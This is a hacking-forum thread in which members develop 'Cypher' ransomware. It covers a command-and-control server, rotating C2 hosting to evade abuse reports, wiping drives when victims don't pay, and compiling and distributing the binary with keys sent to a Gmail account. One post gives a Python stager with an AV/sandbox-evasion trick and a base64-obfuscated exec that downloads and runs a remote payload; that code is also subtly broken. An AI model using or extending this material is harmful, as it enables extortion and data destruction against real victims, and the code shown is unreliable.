Active Development: Cypher Ransomware.
#21
Here is a small update, i've spoken to a web developer friend of mine and after talking about the ransomware i had in development he wanted to take a crack at setting up a web app for it's C&C. I have forked his work over to my github account. I wanted to get your guys' opinion on this.

https://github.com/NullArray/Ransom

There is the web app, it has been written with Laravel, the PHP framework. In the interest of saving time i could see myself using this code for Cypher's C&C. But, on the other hand, it would go against a design principle i had in my head, that the entire project would be written in Python.

Anyway, opinions?
Reply
#22
(01-04-2017, 07:42 PM)Vector Wrote: Here is a small update, i've spoken to a web developer friend of mine and after talking about the ransomware i had in development he wanted to take a crack at setting up a web app for it's C&C. I have forked his work over to my github account. I wanted to get your guys' opinion on this.

https://github.com/NullArray/Ransom

There is the web app, it has been written with Laravel, the PHP framework. In the interest of saving time i could see myself using this code for Cypher's C&C. But, on the other hand, it would go against a design principle i had in my head, that the entire project would be written in Python.

Anyway, opinions?
Hello everybody!
this is my first post at this forum, so it's nice to meet you all. I have been reading the topic and find it very educational for a newby like me. As to the subject, I guess your approach is a bit complicated. You could use a simple php+mysql scheme with just a couple of lines of code. Anyway in terms of operational security one would have to change c2 hosting every couple of days due to numerous abuse letters etc. there are a couple of repositories at github where you can get an onion-based cc.. like this one  https://github.com/lucdew/goransomware (in golang).  
And there is one more feature you might consider useful - many ransomware victims are reluctant to pay, so they could turn to a third party to decypher.. there must be a hard aproach to this...if th e ransom is not paid within the given time interval - "format ABCDEF" etc/// wih system derive the last in line.. well, and pardon my mistakes? I m not a native speaker

here is the py server for the cypher - integrate them - https://github.com/mrmoss/ransomware/tree/master/server - i can test it later .. PEACE AND LOVE )))
Reply
#23
(01-20-2017, 04:43 PM)hiaby Wrote:
(01-04-2017, 07:42 PM)Vector Wrote: Here is a small update, i've spoken to a web developer friend of mine and after talking about the ransomware i had in development he wanted to take a crack at setting up a web app for it's C&C. I have forked his work over to my github account. I wanted to get your guys' opinion on this.

https://github.com/NullArray/Ransom

There is the web app, it has been written with Laravel, the PHP framework. In the interest of saving time i could see myself using this code for Cypher's C&C. But, on the other hand, it would go against a design principle i had in my head, that the entire project would be written in Python.

Anyway, opinions?
Hello everybody!
this is my first post at this forum, so it's nice to meet you all. I have been reading the topic and find it very educational for a newby like me. As to the subject, I guess your approach is a bit complicated. You could use a simple php+mysql scheme with just a couple of lines of code. Anyway in terms of operational security one would have to change c2 hosting every couple of days due to numerous abuse letters etc. there are a couple of repositories at github where you can get an onion-based cc.. like this one  https://github.com/lucdew/goransomware (in golang).  
And there is one more feature you might consider useful - many ransomware victims are reluctant to pay, so they could turn to a third party to decypher.. there must be a hard aproach to this...if th e ransom is not paid within the given time interval - "format ABCDEF" etc/// wih system derive the last in line.. well, and pardon my mistakes? I m not a native speaker

here is the py server for the cypher - integrate them - https://github.com/mrmoss/ransomware/tree/master/server - i can test it later .. PEACE AND LOVE )))


Thank you for your contribution and welcome to the forums. It's been a while since i have worked on this project due to some personal commitments unrelated to this work. That said, i know about the Go ransomware, pretty cool project and yeah i have thought about getting the C&C set up on an onion. It's just one of those things that keep piling  up on the work load. Anyway, thanks for linking the Python script that looks interesting!
Reply
#24
How does it works ? I looks little bit too complicated
Reply
#25
(01-27-2017, 11:26 PM)Universal Wrote: How does it works ? I looks little bit too complicated

For now you can ignore the HTTP_Ops() function, that is for contacting the Django web-app i intend to finish. For now you can just set up a gmail account for the ransomware, and it will send details like encryption key and such to that address. Basically what you will need to do is compile it with Py2exe or Pyinstaller, and distribute the binary through whichever means you find appropriate. As of now, if the target is on Linux, you will need to deliver the bootlocker as .bin with it as well. Other than that it will just generate a key, encrypt the files based on extension and add a .crypt extension of it's own. Then it will write out a readme file to the victim's desktop with instructions on how to recover the key. If you set everything up as it should, the gmail account should have the key and client ID to relay to the victim.
Reply
#26
Just made a stager for Cypher. I may do a pull req on the github, but it's not fully tested yet. Should work though.

Code:
import requests, base64

def evader():
    try:
        while True:
            f = open('/fuewahvewa/fewaifhewafe/feaefefefefefe.f_u_av')
            f.close()
    except FileNotFoundError:
        return False # Not in sandbox/AV

evader()
exec(base64.b64decode(cGF5bG9hZCA9IHJlcXVlc3RzLmdldCgnaHR0cDovL2V4YW1wbGUuY29tL3BheWxvYWQucHknKS
5yZXNwb25zZTsgZXhlYyhwYXlsb2FkKQo=))
Reply
#27
(05-09-2020, 07:46 PM)Dismal_0x8 Wrote: Just made a stager for Cypher. I may do a pull req on the github, but it's not fully tested yet. Should work though.

Well I am unfamiliar with the meaning of stagger for malware, but take into account that creating that file would be an easy fix for the ransomware.
And because this is a string I see no problem in dissembling the executable or just running strings to it and get the path to fix.
A similar example was the famous wannacry, in which a registration of a domain caused the spread to stop.
Reply
#28
enmafia2 Wrote:Well I am unfamiliar with the meaning of stagger for malware, but take into account that creating that file would be an easy fix for the ransomware.
And because this is a string I see no problem in dissembling the executable or just running strings to it and get the path to fix.
A similar example was the famous wannacry, in which a registration of a domain caused the spread to stop.

Sometimes malware execution is split into parts. For instance you have a small disposable stager and your main malware payload. The stager is sent to the target and executed. The stager sometimes has other functions, but it mainly downloads the main part of the payload. Stagers are helpful because they're small in size and are easy to just recode of they start getting detected by AV.
Reply
#29
(05-09-2020, 09:52 PM)Dismal_0x8 Wrote:
enmafia2 Wrote:Well I am unfamiliar with the meaning of stagger for malware, but take into account that creating that file would be an easy fix for the ransomware.
And because this is a string I see no problem in dissembling the executable or just running strings to it and get the path to fix.
A similar example was the famous wannacry, in which a registration of a domain caused the spread to stop.

Sometimes malware execution is split into parts. For instance you have a small disposable stager and your main malware payload. The stager is sent to the target and executed. The stager sometimes has other functions, but it mainly downloads the main part of the payload. Stagers are helpful because they're small in size and are easy to just recode of they start getting detected by AV.

Oh okay I get it, I always called them droppers tho Tongue
Reply
#30
enmafia2 Wrote:Oh okay I get it, I always called them droppers tho

Yeah the line between stagers and droppers is kind of blurry. The way I think about it is that droppers are usually bigger and have more functionality.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Welcome to the GS Development section. Apply here to join the Dev Team! Vector 20 28,976 07-16-2020, 08:36 PM
Last Post: Vector
  Mimir - OSINT Threat Intel Interface. (Active Dev - Assistance Requested) Vector 3 7,153 05-04-2017, 07:18 AM
Last Post: Vector